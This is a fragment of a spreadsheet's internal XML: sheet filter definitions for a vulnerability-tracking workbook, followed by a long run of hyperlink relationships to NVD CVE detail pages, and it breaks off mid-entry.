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CVEs'!$A$1:$T$1694</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'New Today'!$A$1:$T$1679</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Significant Updates'!$A$1:$T$1</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Added to KEV'!$A$1:$T$16</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'KEV - Exploited'!$A$1:$T$19</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">'Critical &amp; High'!$A$1:$T$1082</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">'Watchlist'!$A$1:$T$443</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'Packages (GHSA-OSV)'!$A$1:$T$109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81963" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60004" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44756" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12645" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12646" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12647" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12650" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48273" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78234" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12744" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12745" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28606" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49921" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58822" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61516" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69276" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69408" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69491" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69493" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69496" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69579" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69586" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69590" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69595" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69715" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69730" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69768" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69769" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69819" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69824" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71374" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71376" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71377" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72982" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72983" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78509" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78510" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79569" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79570" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79574" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79576" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79577" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65669" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82533" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62645" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62647" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69356" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76200" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76201" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78997" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67367" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84197" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62646" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69641" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75746" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86729" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86840" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53581" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85982" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50093" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12648" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12651" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16502" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18851" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28609" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28618" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28666" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30754" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49879" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49882" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62744" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62895" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65772" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68828" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69285" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69334" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69355" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69360" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69386" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69434" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69442" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69485" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69494" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69495" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69499" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69511" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69529" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69547" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69556" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69598" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69601" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69603" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69614" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69628" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69629" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69632" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 